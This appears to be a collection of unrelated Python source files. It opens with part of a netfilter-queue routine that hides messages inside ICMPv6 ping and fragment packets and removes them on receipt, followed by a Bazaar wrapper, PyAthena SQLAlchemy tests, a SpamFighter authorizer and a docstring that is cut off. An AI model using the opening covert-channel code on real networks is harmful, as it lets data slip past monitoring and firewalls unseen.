self._encoder.getmessage(packet) # decode message\n if message is None: # no message \n ''' Accept packet '''\n payload.set_verdict(nfqueue.NF_ACCEPT)\n else:\n ''' Remove message and pass modified packet to queue '''\n modified_packet = self._encoder.removemessage(packet)\n payload.set_verdict_modified(nfqueue.NF_ACCEPT,\n str(modified_packet),\n len(modified_packet))\n try:\n if not len(message):\n return\n except:\n pass\n self._pipe.send((message, (packet.src, self._port, 0, 0))) \n#---------------------------------------------------------------------------------- \n def _outgoing(self, packet, payload):\n if self._stop_send.is_set():\n self._clear()\n if self._pipe.poll(): # any data to send?\n message = self._pipe.recv() # get message\n ''' Encode message and return modified packet to queue '''\n modified_packet = self._encoder.addmessage(message, (packet, None))\n payload.set_verdict_modified(nfqueue.NF_ACCEPT, \n str(modified_packet), \n len(modified_packet))\n if not self._pipe.poll(): # sending finished\n self._can_send.set()\n else: # nothing to send, return packet to queue\n payload.set_verdict(nfqueue.NF_ACCEPT) \n#----------------------------------------------------------------------------------\n def _checkport(self, packet):\n ''' \n Returns tuple (bool, value). True, if packet belongs to this queue. In pa-\n ssive mode always returns True. In active mode upperlayer id field must ma-\n tch current _port number. 
Value is number of queue where will be packet re-\n routed.\n '''\n ''' Passive mode - override icmp id check '''\n if not self._active:\n return (True, 0)\n \n ''' Active mode - check icmp (or fragment) id field (~ represents port) '''\n if packet.haslayer(ICMPv6EchoRequest): # upperlayer ICMPv6EchoRequest\n id = packet[ICMPv6EchoRequest].id \n elif packet.haslayer(ICMPv6EchoReply): # upperlayer ICMPv6EchoReply\n id = packet[ICMPv6EchoReply].id \n elif packet.haslayer(IPv6ExtHdrFragment): # fragmented packet\n id = packet[IPv6ExtHdrFragment].id \n elif packet.haslayer(ICMPv6Unknown) and packet.haslayer(IPv6ExtHdrAH):\n type = packet[ICMPv6Unknown].type # ICMPv6 packet with AH\n if type != 128 and type != 129:\n return (False, -1) # accept packet\n packet[IPv6ExtHdrAH].decode_payload_as(ICMPv6EchoRequest)\n id = packet[ICMPv6EchoRequest].id \n elif self._proto == self._const.PROTO_ALL: # any protocol\n return (True, 0) # id matches port number\n else:\n return (False, -1) # accept packet\n \n if id == self._port:\n return (True, 0) # id matches port number\n else:\n return (False, id) # reroute to correct queue\n#----------------------------------------------------------------------------------\n"", '###############################################################################\n# Name: Cody Precord #\n# Purpose: SourceControl implementation for Bazaar #\n# Author: Cody Precord dummy@email.com #\n# Copyright: (c) 2008 Cody Precord dummy@email.com #\n# License: wxWindows License #\n###############################################################################\n\n""""""Bazaar implementation of the SourceControl object """"""\n\n__author__ = ""Cody Precord dummy@email.com""\n__revision__ = ""$Revision: 867 $""\n__scid__ = ""$Id: BZR.py 867 2009-05-06 12:10:55Z CodyPrecord $""\n\n#------------------------------------------------------------------------------#\n# Imports\nimport os\nimport datetime\nimport re\nimport time\n\n# Local imports\nfrom SourceControl import SourceControl, DecodeString\n\n#------------------------------------------------------------------------------#\n\nclass BZR(SourceControl):\n """""" Bazaar source control class """"""\n name = \'Bazaar\'\n command = \'bzr\'\n ccache = list() # Cache of paths that are under bazaar control\n repocache = dict()\n\n def __repr__(self):\n return \'BZR.BZR()\'\n \n def getAuthOptions(self, path):\n """""" Get the repository authentication info """"""\n output = []\n return output\n \n def getRepository(self, path):\n """""" Get the repository of a given path """"""\n if path in self.repocache:\n return self.repocache[path]\n\n if not os.path.isdir(path):\n root = os.path.split(path)[0]\n else:\n root = path\n\n while True:\n if not root:\n break\n\n if os.path.exists(os.path.join(root, \'.bzr\')):\n break\n else:\n root = os.path.split(root)[0]\n\n # Cache the repo of this path for faster lookups next time\n self.repocache[path] = root\n return root\n \n def isControlled(self, path):\n """""" Is the path controlled by BZR? 
""""""\n t1 = time.time()\n # Check for cached paths to speed up lookup\n if path in self.ccache:\n return True\n\n if not os.path.isdir(path):\n root = os.path.split(path)[0]\n else:\n root = path\n\n last = False\n while True:\n if os.path.exists(os.path.join(root, \'.bzr\')):\n # If a containing directory of the given path has a .bzr\n # directory in it run status to find out if the file is being\n # tracked or not.\n retval = False\n out = self.run(root + os.sep, [\'status\', \'-S\', path])\n if out:\n lines = out.stdout.readline()\n if lines.startswith(\'?\'):\n fname = lines.split(None, 1)[1].strip()\n fname = fname.rstrip(os.sep)\n retval = not path.endswith(fname)\n else:\n retval = True\n self.closeProcess(out)\n\n if retval:\n self.ccache.append(path)\n return retval\n elif last:\n break\n else:\n root, tail = os.path.split(root)\n # If tail is None or \'\' then this has gotten to the root\n # so mark it as the last run\n if not tail:\n last = True\n\n return False\n\n def add(self, paths):\n """""" Add paths to the repository """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'add\'] + files)\n self.logOutput(out)\n self.closeProcess(out)\n \n def checkout(self, paths):\n """""" Checkout files at the given path """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'checkout\',], files)\n self.logOutput(out)\n self.closeProcess(out)\n \n def commit(self, paths, message=\'\'):\n """""" Commit paths to the repository """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'commit\', \'-m\', message] + files)\n self.logOutput(out)\n self.closeProcess(out)\n \n def diff(self, paths):\n """""" Run the diff program on the given files """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'diff\'] + files)\n self.closeProcess(out)\n\n def makePatch(self, paths):\n """""" Make a patch of the given paths """"""\n root, files = self.splitFiles(paths)\n patches = list()\n for fname in files:\n out = self.run(root, [\'diff\', fname])\n lines = [ line for line in out.stdout ]\n self.closeProcess(out)\n patches.append((fname, \'\'.join(lines)))\n return patches\n\n def history(self, paths, history=None):\n """""" Get the revision history of the given paths """"""\n if history is None:\n history = []\n\n root, files = self.splitFiles(paths)\n for fname in files:\n out = self.run(root, [\'log\', fname])\n logstart = False\n if out:\n for line in out.stdout:\n self.log(line)\n if line.strip().startswith(\'-----------\'):\n logstart = False\n current = dict(path=fname, revision=None, \n author=None, date=None, log=u\'\')\n history.append(current)\n elif line.startswith(\'message:\'):\n logstart = True\n elif logstart:\n current[\'log\'] += DecodeString(line)\n elif line.startswith(\'revno:\'):\n current[\'revision\'] = DecodeString(line.split(None, 1)[-1].strip())\n elif line.startswith(\'committer:\'):\n author = line.split(None, 1)[-1]\n current[\'author\'] = DecodeString(author.strip())\n elif line.startswith(\'timestamp:\'):\n date = line.split(None, 1)[-1]\n current[\'date\'] = self.str2datetime(date.strip())\n else:\n pass\n self.logOutput(out)\n self.closeProcess(out)\n return history\n \n def str2datetime(self, tstamp):\n """""" Convert a timestamp string to a datetime object """"""\n parts = tstamp.split()\n ymd = [int(x.strip()) for x in parts[1].split(\'-\')]\n hms = [int(x.strip()) for x in parts[2].split(\':\')]\n date = ymd + hms\n return datetime.datetime(*date)\n \n def remove(self, paths):\n """""" Recursively 
remove paths from repository """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'remove\', \'--force\'] + files)\n self.logOutput(out)\n \n def status(self, paths, recursive=False, status=dict()):\n """""" Get BZR status information from given file/directory """"""\n codes = {\' \':\'uptodate\', \'N\':\'added\', \'C\':\'conflict\', \'D\':\'deleted\',\n \'M\':\'modified\'}\n root, files = self.splitFiles(paths)\n # -S gives output similar to svn which is a little easier to work with\n out = self.run(root, [\'status\', \'-S\'] + files)\n repo = self.getRepository(paths[0])\n relpath = root.replace(repo, \'\', 1).lstrip(os.sep)\n unknown = list()\n if out:\n for line in out.stdout:\n self.log(line)\n txt = line.lstrip(\' +-\')\n\n # Split the status code and relative file path\n code, fname = txt.split(None, 1)\n fname = fname.replace(u\'/\', os.sep).strip().rstrip(os.sep)\n fname = fname.replace(relpath, \'\', 1).lstrip(os.sep)\n code = code.rstrip(\'*\')\n\n # Skip unknown files\n if code == \'?\':\n unknown.append(fname)\n continue\n\n # Get the absolute file path\n current = dict()\n\n try:\n current[\'status\'] = codes[code]\n status[fname] = current\n except KeyError:\n pass\n\n # Find up to date files\n unknown += status.keys()\n for path in os.listdir(root):\n if path not in unknown:\n status[path] = dict(status=\'uptodate\')\n\n self.logOutput(out)\n return status\n\n def update(self, paths):\n """""" Recursively update paths """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'update\'] + files)\n self.logOutput(out)\n \n def revert(self, paths):\n """""" Recursively revert paths to repository version """"""\n root, files = self.splitFiles(paths)\n if not files:\n files = [\'.\']\n out = self.run(root, [\'revert\'] + files)\n self.logOutput(out)\n\n def fetch(self, paths, rev=None, date=None):\n """""" Fetch a copy of the paths\' contents """"""\n output = []\n for path in paths:\n if os.path.isdir(path):\n continue\n root, files = self.splitFiles(path)\n \n options = []\n if rev:\n options.append(\'-r\')\n options.append(str(rev))\n\n if date:\n # Date format YYYY-MM-DD,HH:MM:SS\n options.append(\'-r\')\n options.append(\'date:%s\' % date)\n \n out = self.run(root, [\'cat\'] + options + files)\n if out:\n output.append(out.stdout.read())\n self.logOutput(out)\n else:\n output.append(None)\n return output\n', '# -*- coding: utf-8 -*-\nimport re\nimport unittest\nimport uuid\nfrom datetime import date, datetime\nfrom decimal import Decimal\nfrom urllib.parse import quote_plus\n\nimport numpy as np\nimport pandas as pd\nimport sqlalchemy\nfrom sqlalchemy import String\nfrom sqlalchemy.engine import create_engine\nfrom sqlalchemy.exc import NoSuchTableError, OperationalError, ProgrammingError\nfrom sqlalchemy.sql import expression\nfrom sqlalchemy.sql.schema import Column, MetaData, Table\nfrom sqlalchemy.sql.sqltypes import (\n BIGINT,\n BINARY,\n BOOLEAN,\n DATE,\n DECIMAL,\n FLOAT,\n INTEGER,\n STRINGTYPE,\n TIMESTAMP,\n)\n\nfrom tests.conftest import ENV, SCHEMA\nfrom tests.util import with_engine\n\n\nclass TestSQLAlchemyAthena(unittest.TestCase):\n """"""Reference test case is following:\n\n https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py\n https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py\n https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py\n """"""\n\n def create_engine(self, **kwargs):\n conn_str = (\n 
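            # The fragments below assemble a normal SQLAlchemy URL of the form
            # dialect+driver://host:port/database?key=value. With illustrative
            # placeholder values (region, schema and bucket are made up), the
            # result looks roughly like:
            #
            #   awsathena+rest://athena.us-west-2.amazonaws.com:443/test_schema
            #       ?s3_staging_dir=s3%3A%2F%2Fexample-bucket%2Fpath%2F&...&compression=snappy
            #
            # s3_staging_dir has to be URL-encoded, hence the quote_plus()
            # calls in the format() arguments further down.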
""awsathena+rest://athena.{region_name}.amazonaws.com:443/""\n + ""{schema_name}?s3_staging_dir={s3_staging_dir}&s3_dir={s3_dir}""\n + ""&compression=snappy""\n )\n if ""verify"" in kwargs:\n conn_str += ""&verify={verify}""\n if ""duration_seconds"" in kwargs:\n conn_str += ""&duration_seconds={duration_seconds}""\n if ""poll_interval"" in kwargs:\n conn_str += ""&poll_interval={poll_interval}""\n if ""kill_on_interrupt"" in kwargs:\n conn_str += ""&kill_on_interrupt={kill_on_interrupt}""\n return create_engine(\n conn_str.format(\n region_name=ENV.region_name,\n schema_name=SCHEMA,\n s3_staging_dir=quote_plus(ENV.s3_staging_dir),\n s3_dir=quote_plus(ENV.s3_staging_dir),\n **kwargs\n )\n )\n\n @with_engine()\n def test_basic_query(self, engine, conn):\n rows = conn.execute(""SELECT * FROM one_row"").fetchall()\n self.assertEqual(len(rows), 1)\n self.assertEqual(rows[0].number_of_rows, 1)\n self.assertEqual(len(rows[0]), 1)\n\n @with_engine()\n def test_reflect_no_such_table(self, engine, conn):\n self.assertRaises(\n NoSuchTableError,\n lambda: Table(""this_does_not_exist"", MetaData(bind=engine), autoload=True),\n )\n self.assertRaises(\n NoSuchTableError,\n lambda: Table(\n ""this_does_not_exist"",\n MetaData(bind=engine),\n schema=""also_does_not_exist"",\n autoload=True,\n ),\n )\n\n @with_engine()\n def test_reflect_table(self, engine, conn):\n one_row = Table(""one_row"", MetaData(bind=engine), autoload=True)\n self.assertEqual(len(one_row.c), 1)\n self.assertIsNotNone(one_row.c.number_of_rows)\n\n @with_engine()\n def test_reflect_table_with_schema(self, engine, conn):\n one_row = Table(""one_row"", MetaData(bind=engine), schema=SCHEMA, autoload=True)\n self.assertEqual(len(one_row.c), 1)\n self.assertIsNotNone(one_row.c.number_of_rows)\n\n @with_engine()\n def test_reflect_table_include_columns(self, engine, conn):\n one_row_complex = Table(""one_row_complex"", MetaData(bind=engine))\n version = float(\n re.search(r""^([\\d]+\\.[\\d]+)\\..+"", sqlalchemy.__version__).group(1)\n )\n if version <= 1.2:\n engine.dialect.reflecttable(\n conn, one_row_complex, include_columns=[""col_int""], exclude_columns=[]\n )\n elif version == 1.3:\n # https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html\n # #PI:KEY\n engine.dialect.reflecttable(\n conn,\n one_row_complex,\n include_columns=[""col_int""],\n exclude_columns=[],\n resolve_fks=True,\n )\n else: # version >= 1.4\n # https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html\n # #change-0215fae622c01f9409eb1ba2754f4792\n # https://docs.sqlalchemy.org/en/14/core/reflection.html\n # #sqlalchemy.engine.reflection.Inspector.reflect_table\n insp = sqlalchemy.inspect(engine)\n insp.reflect_table(\n one_row_complex,\n include_columns=[""col_int""],\n exclude_columns=[],\n resolve_fks=True,\n )\n self.assertEqual(len(one_row_complex.c), 1)\n self.assertIsNotNone(one_row_complex.c.col_int)\n self.assertRaises(AttributeError, lambda: one_row_complex.c.col_tinyint)\n\n @with_engine()\n def test_unicode(self, engine, conn):\n unicode_str = ""密林""\n one_row = Table(""one_row"", MetaData(bind=engine))\n returned_str = sqlalchemy.select(\n [expression.bindparam(""あまぞん"", unicode_str, type_=String())],\n from_obj=one_row,\n ).scalar()\n self.assertEqual(returned_str, unicode_str)\n\n @with_engine()\n def test_reflect_schemas(self, engine, conn):\n insp = sqlalchemy.inspect(engine)\n schemas = insp.get_schema_names()\n self.assertIn(SCHEMA, schemas)\n self.assertIn(""default"", schemas)\n\n @with_engine()\n def test_get_table_names(self, 
engine, conn):\n meta = MetaData()\n meta.reflect(bind=engine)\n print(meta.tables)\n self.assertIn(""one_row"", meta.tables)\n self.assertIn(""one_row_complex"", meta.tables)\n\n insp = sqlalchemy.inspect(engine)\n self.assertIn(\n ""many_rows"",\n insp.get_table_names(schema=SCHEMA),\n )\n\n @with_engine()\n def test_has_table(self, engine, conn):\n insp = sqlalchemy.inspect(engine)\n self.assertTrue(insp.has_table(""one_row"", schema=SCHEMA))\n self.assertFalse(insp.has_table(""this_table_does_not_exist"", schema=SCHEMA))\n\n @with_engine()\n def test_get_columns(self, engine, conn):\n insp = sqlalchemy.inspect(engine)\n actual = insp.get_columns(table_name=""one_row"", schema=SCHEMA)[0]\n self.assertEqual(actual[""name""], ""number_of_rows"")\n self.assertTrue(isinstance(actual[""type""], INTEGER))\n self.assertTrue(actual[""nullable""])\n self.assertIsNone(actual[""default""])\n self.assertEqual(actual[""ordinal_position""], 1)\n self.assertIsNone(actual[""comment""])\n\n @with_engine()\n def test_char_length(self, engine, conn):\n one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True)\n result = (\n sqlalchemy.select(\n [sqlalchemy.func.char_length(one_row_complex.c.col_string)]\n )\n .execute()\n .scalar()\n )\n self.assertEqual(result, len(""a string""))\n\n @with_engine()\n def test_reflect_select(self, engine, conn):\n one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True)\n self.assertEqual(len(one_row_complex.c), 15)\n self.assertIsInstance(one_row_complex.c.col_string, Column)\n rows = one_row_complex.select().execute().fetchall()\n self.assertEqual(len(rows), 1)\n self.assertEqual(\n list(rows[0]),\n [\n True,\n 127,\n 32767,\n 2147483647,\n 9223372036854775807,\n 0.5,\n 0.25,\n ""a string"",\n datetime(2017, 1, 1, 0, 0, 0),\n date(2017, 1, 2),\n b""123"",\n ""[1, 2]"",\n ""{1=2, 3=4}"",\n ""{a=1, b=2}"",\n Decimal(""0.1""),\n ],\n )\n self.assertIsInstance(one_row_complex.c.col_boolean.type, BOOLEAN)\n self.assertIsInstance(one_row_complex.c.col_tinyint.type, INTEGER)\n self.assertIsInstance(one_row_complex.c.col_smallint.type, INTEGER)\n self.assertIsInstance(one_row_complex.c.col_int.type, INTEGER)\n self.assertIsInstance(one_row_complex.c.col_bigint.type, BIGINT)\n self.assertIsInstance(one_row_complex.c.col_float.type, FLOAT)\n self.assertIsInstance(one_row_complex.c.col_double.type, FLOAT)\n self.assertIsInstance(one_row_complex.c.col_string.type, type(STRINGTYPE))\n self.assertIsInstance(one_row_complex.c.col_timestamp.type, TIMESTAMP)\n self.assertIsInstance(one_row_complex.c.col_date.type, DATE)\n self.assertIsInstance(one_row_complex.c.col_binary.type, BINARY)\n self.assertIsInstance(one_row_complex.c.col_array.type, type(STRINGTYPE))\n self.assertIsInstance(one_row_complex.c.col_map.type, type(STRINGTYPE))\n self.assertIsInstance(one_row_complex.c.col_struct.type, type(STRINGTYPE))\n self.assertIsInstance(one_row_complex.c.col_decimal.type, DECIMAL)\n\n @with_engine()\n def test_reserved_words(self, engine, conn):\n """"""Presto uses double quotes, not backticks""""""\n fake_table = Table(\n ""select"", MetaData(bind=engine), Column(""current_timestamp"", STRINGTYPE)\n )\n query = str(fake_table.select(fake_table.c.current_timestamp == ""a""))\n self.assertIn(\'""select""\', query)\n self.assertIn(\'""current_timestamp""\', query)\n self.assertNotIn(""`select`"", query)\n self.assertNotIn(""`current_timestamp`"", query)\n\n @with_engine()\n def test_retry_if_data_catalog_exception(self, engine, conn):\n 
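        # The assertions below exercise a dialect helper that decides whether
        # a failed query should be retried: retrying only makes sense when the
        # entity named in the ""... not found"" message is not the database or
        # table the query actually targeted, i.e. the failure may be transient
        # catalog propagation rather than a genuinely missing object. A
        # condensed sketch of such a predicate (hypothetical names, for
        # illustration only; the real PyAthena helper differs in detail):
        #
        #   def _retry_if_data_catalog_exception(exc, database, table):
        #       if not isinstance(exc, OperationalError):
        #           return False
        #       msg = str(exc)
        #       targets = ((""Database"", database), (""Namespace"", database),
        #                  (""Table"", table))
        #       return not any(""{0} {1} not found"".format(kind, name) in msg
        #                      for kind, name in targets)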
dialect = engine.dialect\n exc = OperationalError(\n """", None, ""Database does_not_exist not found. Please check your query.""\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""this_does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""this_does_not_exist""\n )\n )\n\n exc = OperationalError(\n """", None, ""Namespace does_not_exist not found. Please check your query.""\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""this_does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""this_does_not_exist""\n )\n )\n\n exc = OperationalError(\n """", None, ""Table does_not_exist not found. Please check your query.""\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""this_does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""does_not_exist""\n )\n )\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""this_does_not_exist""\n )\n )\n\n exc = OperationalError("""", None, ""foobar."")\n self.assertTrue(\n dialect._retry_if_data_catalog_exception(exc, ""foobar"", ""foobar"")\n )\n\n exc = ProgrammingError(\n """", None, ""Database does_not_exist not found. 
Please check your query.""\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""does_not_exist"", ""this_does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""does_not_exist""\n )\n )\n self.assertFalse(\n dialect._retry_if_data_catalog_exception(\n exc, ""this_does_not_exist"", ""this_does_not_exist""\n )\n )\n\n @with_engine()\n def test_get_column_type(self, engine, conn):\n dialect = engine.dialect\n self.assertEqual(dialect._get_column_type(""boolean""), ""boolean"")\n self.assertEqual(dialect._get_column_type(""tinyint""), ""tinyint"")\n self.assertEqual(dialect._get_column_type(""smallint""), ""smallint"")\n self.assertEqual(dialect._get_column_type(""integer""), ""integer"")\n self.assertEqual(dialect._get_column_type(""bigint""), ""bigint"")\n self.assertEqual(dialect._get_column_type(""real""), ""real"")\n self.assertEqual(dialect._get_column_type(""double""), ""double"")\n self.assertEqual(dialect._get_column_type(""varchar""), ""varchar"")\n self.assertEqual(dialect._get_column_type(""timestamp""), ""timestamp"")\n self.assertEqual(dialect._get_column_type(""date""), ""date"")\n self.assertEqual(dialect._get_column_type(""varbinary""), ""varbinary"")\n self.assertEqual(dialect._get_column_type(""array(integer)""), ""array"")\n self.assertEqual(dialect._get_column_type(""map(integer, integer)""), ""map"")\n self.assertEqual(dialect._get_column_type(""row(a integer, b integer)""), ""row"")\n self.assertEqual(dialect._get_column_type(""decimal(10,1)""), ""decimal"")\n\n @with_engine()\n def test_contain_percents_character_query(self, engine, conn):\n select = sqlalchemy.sql.text(\n """"""\n SELECT date_parse(\'20191030\', \'%Y%m%d\')\n """"""\n )\n table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()\n\n query = sqlalchemy.select([""*""]).select_from(table_expression)\n result = engine.execute(query)\n self.assertEqual(result.fetchall(), [(datetime(2019, 10, 30),)])\n\n query_with_limit = (\n sqlalchemy.sql.select([""*""]).select_from(table_expression).limit(1)\n )\n result_with_limit = engine.execute(query_with_limit)\n self.assertEqual(result_with_limit.fetchall(), [(datetime(2019, 10, 30),)])\n\n @with_engine()\n def test_query_with_parameter(self, engine, conn):\n select = sqlalchemy.sql.text(\n """"""\n SELECT :word\n """"""\n )\n table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()\n\n query = sqlalchemy.select([""*""]).select_from(table_expression)\n result = engine.execute(query, word=""cat"")\n self.assertEqual(result.fetchall(), [(""cat"",)])\n\n query_with_limit = (\n sqlalchemy.select([""*""]).select_from(table_expression).limit(1)\n )\n result_with_limit = engine.execute(query_with_limit, word=""cat"")\n self.assertEqual(result_with_limit.fetchall(), [(""cat"",)])\n\n @with_engine()\n def test_contain_percents_character_query_with_parameter(self, engine, conn):\n select1 = sqlalchemy.sql.text(\n """"""\n SELECT date_parse(\'20191030\', \'%Y%m%d\'), :word\n """"""\n )\n table_expression1 = sqlalchemy.sql.selectable.TextAsFrom(select1, []).cte()\n\n query1 = sqlalchemy.select([""*""]).select_from(table_expression1)\n result1 = engine.execute(query1, word=""cat"")\n self.assertEqual(result1.fetchall(), [(datetime(2019, 10, 30), ""cat"")])\n\n query_with_limit1 = (\n 
sqlalchemy.select([""*""]).select_from(table_expression1).limit(1)\n )\n result_with_limit1 = engine.execute(query_with_limit1, word=""cat"")\n self.assertEqual(\n result_with_limit1.fetchall(), [(datetime(2019, 10, 30), ""cat"")]\n )\n\n select2 = sqlalchemy.sql.text(\n """"""\n SELECT col_string, :param FROM one_row_complex\n WHERE col_string LIKE \'a%\' OR col_string LIKE :param\n """"""\n )\n table_expression2 = sqlalchemy.sql.selectable.TextAsFrom(select2, []).cte()\n\n query2 = sqlalchemy.select([""*""]).select_from(table_expression2)\n result2 = engine.execute(query2, param=""b%"")\n self.assertEqual(result2.fetchall(), [(""a string"", ""b%"")])\n\n query_with_limit2 = (\n sqlalchemy.select([""*""]).select_from(table_expression2).limit(1)\n )\n result_with_limit2 = engine.execute(query_with_limit2, param=""b%"")\n self.assertEqual(result_with_limit2.fetchall(), [(""a string"", ""b%"")])\n\n @with_engine()\n def test_nan_checks(self, engine, conn):\n dialect = engine.dialect\n self.assertFalse(dialect._is_nan(""string""))\n self.assertFalse(dialect._is_nan(1))\n self.assertTrue(dialect._is_nan(float(""nan"")))\n\n @with_engine()\n def test_to_sql(self, engine, conn):\n # TODO pyathena.error.OperationalError: SYNTAX_ERROR: line 1:305:\n # Column \'foobar\' cannot be resolved.\n # def _format_bytes(formatter, escaper, val):\n # return val.decode()\n table_name = ""to_sql_{0}"".format(str(uuid.uuid4()).replace(""-"", """"))\n df = pd.DataFrame(\n {\n ""col_int"": np.int32([1]),\n ""col_bigint"": np.int64([12345]),\n ""col_float"": np.float32([1.0]),\n ""col_double"": np.float64([1.2345]),\n ""col_string"": [""a""],\n ""col_boolean"": np.bool_([True]),\n ""col_timestamp"": [datetime(2020, 1, 1, 0, 0, 0)],\n ""col_date"": [date(2020, 12, 31)],\n # ""col_binary"": ""foobar"".encode(),\n }\n )\n # Explicitly specify column order\n df = df[\n [\n ""col_int"",\n ""col_bigint"",\n ""col_float"",\n ""col_double"",\n ""col_string"",\n ""col_boolean"",\n ""col_timestamp"",\n ""col_date"",\n # ""col_binary"",\n ]\n ]\n df.to_sql(\n table_name,\n engine,\n schema=SCHEMA,\n index=False,\n if_exists=""replace"",\n method=""multi"",\n )\n\n table = Table(table_name, MetaData(bind=engine), autoload=True)\n self.assertEqual(\n table.select().execute().fetchall(),\n [\n (\n 1,\n 12345,\n 1.0,\n 1.2345,\n ""a"",\n True,\n datetime(2020, 1, 1, 0, 0, 0),\n date(2020, 12, 31),\n # ""foobar"".encode(),\n )\n ],\n )\n\n @with_engine(verify=""false"")\n def test_conn_str_verify(self, engine, conn):\n kwargs = conn.connection._kwargs\n self.assertFalse(kwargs[""verify""])\n\n @with_engine(duration_seconds=""1800"")\n def test_conn_str_duration_seconds(self, engine, conn):\n kwargs = conn.connection._kwargs\n self.assertEqual(kwargs[""duration_seconds""], 1800)\n\n @with_engine(poll_interval=""5"")\n def test_conn_str_poll_interval(self, engine, conn):\n self.assertEqual(conn.connection.poll_interval, 5)\n\n @with_engine(kill_on_interrupt=""false"")\n def test_conn_str_kill_on_interrupt(self, engine, conn):\n self.assertFalse(conn.connection.kill_on_interrupt)\n', '# -*- coding: utf-8 -*-\n#\n# SpamFighter, Copyright 2008, 2009 NetStream LLC (http://netstream.ru/, dummy@email.com)\n#\n# This file is part of SpamFighter.\n#\n# SpamFighter is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# SpamFighter is distributed in the hope 
that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with SpamFighter. If not, see .\n#\n\n""""""\nМодуль авторизации партнеров без логинов/паролей (на доверии).\n""""""\n\nfrom zope.interface import implements\nfrom twisted.internet import defer\n\nfrom spamfighter.interfaces import IPartner, IPartnerAuthorizer\nfrom spamfighter.core.partner import PartnerAuthorizationFailedError\nfrom spamfighter.core.domain import getDefaultDomain, BaseDomain\nfrom spamfighter.plugin import loadPlugin, IDefaultDomainProvider\nfrom spamfighter.utils import config\n\nclass NullPartner(object):\n """"""\n Партнер, авторизованный без логина/пароля (на доверии).\n\n @ivar domain: корневой домен партнера\n @type domain: L{BaseDomain}\n """"""\n implements(IPartner)\n\n def __init__(self):\n """"""\n Конструктор.\n """"""\n domainProvider = loadPlugin(IDefaultDomainProvider, config.plugins.domain.null_partner_domain_provider)\n self.domain = domainProvider.getDefaultDomain()\n\n def rootDomain(self):\n """"""\n Получить корневой домен партнера.\n\n @return: Deferred, корневой домен (L{IDomain})\n @rtype: C{twisted.internet.defer.Deferred} \n """"""\n return defer.succeed(self.domain)\n\nclass NullPartnerAuthorizer(object):\n """"""\n Провайдер авторизации партнеров без логина/пароля (на доверии).\n\n В этой ситуации доступ к СпамоБорцу ограничен с помощью других средств\n (HTTP-proxy, firewall).\n\n @ivar partner: единственный партнер, который обеспечивает весь доступ\n @type partner: L{NullPartner}\n """"""\n implements(IPartnerAuthorizer)\n\n def __init__(self):\n """"""\n Конструктор.\n """"""\n self.partner = NullPartner()\n\n def authorize(self, partner_info):\n """"""\n Выполнить авторизацию партнера.\n\n @param partner_info: информация о партнере\n @return: Deferred, партнер (L{IPartner})\n @rtype: C{twisted.internet.defer.Deferred} \n """"""\n if partner_info is not None:\n return defer.fail(PartnerAuthorizationFailedError())\n\n return defer.succeed(self.partner)\n', '""""""\n.. module:: operators.dive_operator\n :synopsis: DivePythonOperator for use with TaskRunner\n\n.. moduleauthor:: Laura Lorenz dummy@email.com\n.. 
